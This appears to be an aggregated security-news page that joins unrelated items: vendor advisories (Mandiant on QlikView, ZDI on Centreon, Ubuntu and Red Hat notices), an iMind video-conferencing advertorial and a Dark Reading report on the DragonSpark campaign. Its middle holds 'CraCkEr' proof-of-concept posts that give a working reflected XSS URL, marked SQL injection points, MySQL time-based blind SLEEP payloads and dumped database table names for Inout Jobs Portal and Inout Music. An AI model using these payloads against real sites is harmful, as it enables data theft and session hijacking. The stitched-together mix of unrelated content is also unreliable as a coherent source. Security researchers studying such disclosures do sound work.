Qlik QlikView through 12.60.20100.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0001****Description**

Qlik QlikView for Windows contains a local privilege escalation vulnerability which affected version 12.60.20100.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41989

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Initial Release to Service Release 1. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Oct 5, 2022.
*   05-Oct-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41989

CVE-2021-41989: Vulnerability-Disclosures/MNDT-2023-0001.md at master · mandiant/Vulnerability-Disclosures

This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the handling of requests to configure poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator. Was ZDI-CAN-18304.

October 3rd, 2022

**Centreon Poller Resource SQL Injection Privilege Escalation Vulnerability****ZDI-22-1326  
ZDI-CAN-18304**

CVE ID

CVE-2022-41142

CVSS SCORE

7.2, (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Centreon  

AFFECTED PRODUCTS

Centreon  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the handling of requests to configure poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator.  

ADDITIONAL DETAILS

Centreon has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/centreon/centreon/security/policy  

DISCLOSURE TIMELINE

*   2022-08-23 - Vulnerability reported to vendor
*   2022-10-03 - Coordinated public release of advisory

CREDIT

Anonymous  

BACK TO ADVISORIES

CVE-2022-41142: ZDI-22-1326

Inout Jobs Portal version 2.2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Jobs Portal 2.2.2                                                    ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9[-] Done

Inout Jobs Portal 2.2.2 Cross Site Scripting

Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Jobs Portal 2.2.2                                                    │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=jobs/searchresult

Method: POST

POST parameter 'loc_id' is vulnerable to SQLI

+-----------------------------------------------------------+

-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="search_query"

web  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

1  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="loc_id"

1[INJECT-HERE]  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="serchtype"

simple  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

0  
-----------------------------245625052541747605171577107419

+-----------------------------------------------------------+

[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.6  
[INFO] fetching tables for database: '*****_jobs_portal'  
Database: *****_jobs_portal  
[53 tables]  
+-----------------------------------------+  
| nesote_inoutscripts_company_ratereview  |  
| nesote_inoutscripts_homepage_banner     |  
| nesote_inoutscripts_users               |  
| nesote_jobportal_admin                  |  
| nesote_jobportal_applied_jobs           |  
| nesote_jobportal_city                   |  
| nesote_jobportal_client_logs            |  
| nesote_jobportal_company_size           |  
| nesote_jobportal_company_type           |  
| nesote_jobportal_companyblock           |  
| nesote_jobportal_contents               |  
| nesote_jobportal_country                |  
| nesote_jobportal_coverletters           |  
| nesote_jobportal_currency               |  
| nesote_jobportal_email_templates        |  
| nesote_jobportal_employer_details       |  
| nesote_jobportal_employer_feedback      |  
| nesote_jobportal_functional_role        |  
| nesote_jobportal_industry               |  
| nesote_jobportal_ip_012023              |  
| nesote_jobportal_ip_022020              |  
| nesote_jobportal_ip_032020              |  
| nesote_jobportal_ip_042020              |  
| nesote_jobportal_ip_082021              |  
| nesote_jobportal_ip_092022              |  
| nesote_jobportal_ip_102022              |  
| nesote_jobportal_ip_112022              |  
| nesote_jobportal_ip_122022              |  
| nesote_jobportal_ipn                    |  
| nesote_jobportal_job_types              |  
| nesote_jobportal_jobs                   |  
| nesote_jobportal_jobseeker_details      |  
| nesote_jobportal_languages              |  
| nesote_jobportal_locations              |  
| nesote_jobportal_messages               |  
| nesote_jobportal_months_messages        |  
| nesote_jobportal_news_and_events        |  
| nesote_jobportal_notifications          |  
| nesote_jobportal_packages               |  
| nesote_jobportal_payment_details        |  
| nesote_jobportal_previous_exp           |  
| nesote_jobportal_qualifications         |  
| nesote_jobportal_resumes                |  
| nesote_jobportal_saved_jobs             |  
| nesote_jobportal_saved_resumes          |  
| nesote_jobportal_seekers_qualifications |  
| nesote_jobportal_sent_jobalerts         |  
| nesote_jobportal_settings               |  
| nesote_jobportal_skills                 |  
| nesote_jobportal_specifications         |  
| nesote_jobportal_states                 |  
| nesote_jobportal_success_story          |  
| nesote_jobportal_themes                 |  
+-----------------------------------------+

[-] Done

Inout Jobs Portal 2.2.2 SQL Injection

Inout Music version 5.1.1 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Music 5.1.1                                                          │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=explore/search

Method: POST

POST parameter 'title' is vulnerable to SQLI

---  
Parameter: title (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV  
---

POST parameter 'genre' is vulnerable to SQLI

---  
Parameter: genre (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10  
---

POST parameter 'country' is vulnerable to SQLI

---  
Parameter: country (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)  
---

+-----------------------------------------------------------+

POST /index.php?page=explore/search HTTP/2

-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="title"

love[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="type"

audioalbum  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="genre"

1[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="country"

3[Inject-HERE]  
-----------------------------116235583720082436942508111905--

+-----------------------------------------------------------+

[-] Done

Inout Music 5.1.1 SQL Injection

Ubuntu Security Notice 5823-2 - USN-5823-1 fixed a vulnerability in MySQL. This update provides the corresponding update for Ubuntu 16.04 ESM. Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to MySQL 5.7.41.

=========================================================================  
Ubuntu Security Notice USN-5823-2  
January 24, 2023

mysql-5.7 vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in MySQL.

Software Description:  
- mysql-5.7: MySQL database

Details:

USN-5823-1 fixed a vulnerability in MySQL. This update provides  
the corresponding update for Ubuntu 16.04 ESM.

Original advisory details:

 Multiple security issues were discovered in MySQL and this update includes  
 new upstream MySQL versions to fix these issues.

 MySQL has been updated to MySQL 5.7.41.

 In addition to security fixes, the updated packages contain bug fixes, new  
 features, and possibly incompatible changes.

 Please see the following for more information:

 https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
 https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  mysql-server-5.7                5.7.41-0ubuntu0.16.04.1+esm1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
  https://ubuntu.com/security/notices/USN-5823-2  
  https://ubuntu.com/security/notices/USN-5823-1  
  CVE-2023-21840

Ubuntu Security Notice USN-5823-2

Ubuntu Security Notice 5823-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-5823-1January 24, 2023mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, andUbuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.htmlhttps://www.oracle.com/security-alerts/cpujan2023.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   mysql-server-8.0                8.0.32-0buntu0.22.10.1Ubuntu 22.04 LTS:   mysql-server-8.0                8.0.32-0buntu0.22.04.1Ubuntu 20.04 LTS:   mysql-server-8.0                8.0.32-0buntu0.20.04.1Ubuntu 18.04 LTS:   mysql-server-5.7                5.7.41-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-5823-1   CVE-2022-32221, CVE-2023-21836, CVE-2023-21840, CVE-2023-21863,   CVE-2023-21867, CVE-2023-21868, CVE-2023-21869, CVE-2023-21870,   CVE-2023-21871, CVE-2023-21873, CVE-2023-21875, CVE-2023-21876,   CVE-2023-21877, CVE-2023-21878, CVE-2023-21879, CVE-2023-21880,   CVE-2023-21881, CVE-2023-21882, CVE-2023-21883, CVE-2023-21887Package Information:   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.10.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.20.04.1   https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.41-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5823-1

Red Hat Security Advisory 2023-0400-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:0400-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0400  
Issue date:        2023-01-24  
CVE Names:         CVE-2021-26401 CVE-2022-2964  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update to the latest RHEL7.9.z20 source tree (BZ#2152044)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715  
2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.83.1.rt56.1228.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.83.1.rt56.1228.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-26401  
https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9AInNzjgjWX9erEAQjODA/9GAUKKUrU1NdJJSi9v00ACTHBHWqtB2UW  
K9ojblgRnXv0Cuwdxj6xpyBYW3RkVN3b4HBksdxG8jif+gJ/4lc2MbSC41M9srb8  
ckUJJ8mNDeWp6MDYLDJpL7Hb0WKNsaQaOlLHH7u2fWK/r21jOkCyGcUrrGJazENN  
H2xDDfz2JdnIS38Z0RJd80A4VtVt+kz/n9/qHnWXA0+IDyAevEUYt58zw6fclKre  
Rj+5/T4G1wEjHlnaKBy6UczX0INe6AT/2VdtKyiQ0ovENDSFH8cpCxLH44sH1Fqh  
BtyCFEuYuvbCDMgftMw3mTWKW6QtWtMLhmPliIsMuZ9dXkBiQ3Ux6NUem/wNnwFX  
Iu8TvKmnhsYqL2EinAKBV1cJP1lvjLKUUwBRRzW6KDuV8vwJt7AgEsfEjWb2636r  
iiNm0kmLoTNWqcWm0WFWM7UmO0HBcUuAYSopyQlz4erSeFfmTFYos6MzNjVLX3oF  
BXg07KF44akfN+dw8KElYLjjC+5IDYI3pDt4GlF4VoyuIgh5sZRkxwNeKQC7IsQB  
nhJoGQ6PRruz8sW2+wbSQLXWqr3+NDX/GMOPGQOAUt5S+7uD6lKkUjjPzTtvwOtS  
i9FTjzvuVnXwEfEmycZFLQx6bIsfARlwvdOY1QrJmo2joWQ0iOCL30u4k0JAlTF/  
zRiMS5eelho=h5Hj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0400-01

By Owais Sultan
What is video conferencing? It’s a mode of communication which allows you to conduct meetings with all participants…
This is a post from HackRead.com Read the original post: The benefits of video conferencing with iMind

What is video conferencing? It’s a mode of communication which allows you to conduct meetings with all participants in different places at the same time. This means that each participant can see and hear everyone else in real time, as well as share data and files.

Group secure video conferencing software is a tool widely used for personal and business needs nowadays. But not all companies are informed well enough about the helpfulness of this communication mode. That’s why we describe all the advantages of video conferencing as a mode of interaction. 

**Incorporating Video Conferencing Into Your Workflow**

Video conferences benefit from the use of modern technologies and communication platforms. Most of the companies that have adopted such technology have started to see a positive change in their collaboration and productivity. There are some common benefits, including:

*   The ability to have face-to-face meetings with customers and partners from around the world. This is especially useful for companies that work with a global audience.
*   Improved communication between employees from different locations within your company due to real-time interaction on a video call.
*   Increased productivity due to remote working possibilities and less time spent travelling from one place to another.

As a rule, video conferencing is used in business meetings, when people want to communicate with each other virtually. This allows for saving a lot of time and money, as well as increasing the efficiency of teamwork.

The main benefit of video conferencing software is its ability to provide clear communication between users in real-time. With the help of this tool, you can hold meetings with various participants from different parts of the world or even countries at once!

**Using iMind for Working Video Conferencing **

Even though you’ll need a paid plan to unlock some of iMind’s best features, the free plan includes all of its core strengths:

*   an easy-to-use interface
*   possibility of use via browser
*   simple creation and connection of rooms
*   simultaneous screen sharing – high-quality video (up to HD), high-quality sound.

The ability to share screens is useful in many situations, and you can connect up to 100 people for collaboration or a webinar.  

With iMind, you have the opportunity to use almost all the features of the service for free. There is no trial period, you can use the free version with no time limit. However, if you have a need for more possible participants or a longer duration of the conference, you should consider a Business or Enterprise plan.

**iMind or Other Services?**

The iMind platform is a contemporary, up-to-date system that provides a variety of functions for business applications. The software can be used as both an effective tool for standardization and innovation – and it’s hard to deny the benefits of this program for businesses.

1.  How To Make A Messenger App
2.  Best Legal Software For Law Firms
3.  Product Review – Stellar Repair for MS SQL
4.  Zoom adds 2FA as an extra layer of security
5.  How Technology Altered Education Landscape

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

The benefits of video conferencing with iMind

Hackers cleverly cobbled together a suite of open source software — including a novel RAT — and hijacked servers owned by ordinary businesses.

We imagine that the world’s most successful hackers write their own dangerous code and invest heavily in the technologies they use to breach their targets. In recent months, however, a new cluster of attacks succeeded with just the opposite approach.

According to a report out Jan. 24 from SentinelOne, a threat actor compromised a number of organizations across China and Taiwan by creating a Frankenstein's monster-style composite of preexisting open source components. Among them: multiple tools for escalating user privileges in Windows machines, and for establishing persistence and allowing remote code execution.

In addition to adopting other hackers' code, the attackers freely adopted other organizations' infrastructure, too. In staging their malware, the hackers puppeteered servers located in China, Hong Kong, Singapore, and Taiwan, many of which were hosted by perfectly ordinary businesses, including an art gallery, a retailer for baby products, and companies in the gaming and gambling industries.

Researchers from SentinelOne named the campaign "DragonSpark" — a portmanteau referencing the attackers' Chinese-language links, and "SparkRAT," an open source remote access Trojan (RAT) never seen in the wild until now.

**An Open Source Party**

To gain initial access to their targets, the DragonSpark attackers sought out Internet-exposed Web servers and MySQL database servers. Then, with a foot in the door, they began deploying open source malware.

"Open source tools and existing infrastructure are very practical to threat actors," Aleksandar Milenkoski, senior threat researcher at SentinelOne, tells Dark Reading. This is especially true of "actors involved in cybercrime activities without many resources and in-depth technical readiness to develop their own tool set and setup an intricate infrastructure, but aiming for large-scale, opportunistic attacks at the same time."

The DragonSpark attackers carried out their opportunistic attacks with programs like SharpToken and BadPotato, which enable the execution of commands at the level of the Windows operating system. SharpToken also provides visibility to user and process information; it allows a user to freely add, delete, or modify passwords of system users. BadPotato, the researchers noted, had been previously used by other Chinese threat actors in an espionage campaign.

Next in the arsenal was GotoHTTP, which facilitates persistence, file transfer, and remote screen viewing. But the most notable malware of all was SparkRAT — "a very recent development on the threat landscape," Milenkoski noted. DragonSpark represents "the first concrete observation of threat actors using SparkRAT as part of larger campaigns."

Released in its current version on Nov. 1, 2022, SparkRAT is a jack of all trades. It's compatible with not only Windows but also Linux and macOS systems. Its most notable features are as follows, as the researchers outlined:

*   _**"Command execution:** including execution of arbitrary Windows system and PowerShell commands;_
*   _**System manipulation:** including system shutdown, restart, hibernation, and suspension;_
*   _**File and process manipulation:** including process termination as well as file upload, download, and deletion; and_
*   _**Information theft:** including exfiltration of platform information (CPU, network, memory, disk, and system uptime information), screenshot theft, and process and file enumeration."_

SparkRAT, SharpToken, Bad Potato, and GotoHTTP are all freely available to download online. As open-source tools, their use also makes attribution more difficult.

**Links to China**

All of the targets of DragonSpark were organizations based in East Asia. Many of them "have a large customer base," Milenkoski observes, "leading to the belief that the threat actors may be targeting customer data." Whether the motive was cybercrime or espionage was not determined.

Though unable to attribute anyone specific, the researchers considered it "highly likely" that the DragonSpark attackers were Chinese speakers. That is, in part, explained by the fact that most of their infrastructure and targets were located in East Asia. Additionally, the Web shell they used to deploy their malware — a well-known tool called China Chopper — and all of the open source tools described above were originally developed by Chinese-speaking developers and vendors.

This is consistent with recent activity in the world of Chinese threat actors. An alert published last summer by the Cybersecurity and Infrastructure Security Agency (CISA) highlighted how state-sponsored APTs from the People's Republic "often mix their customized toolset with publicly available tools."

All signs point to more of these kinds of attacks going forward. SparkRAT in particular, though nascent to the scene, "is regularly updated with new features," the SentinelOne researchers noted, adding that "the RAT will remain attractive to cybercriminals and other threat actors in the future."

Tag

#sql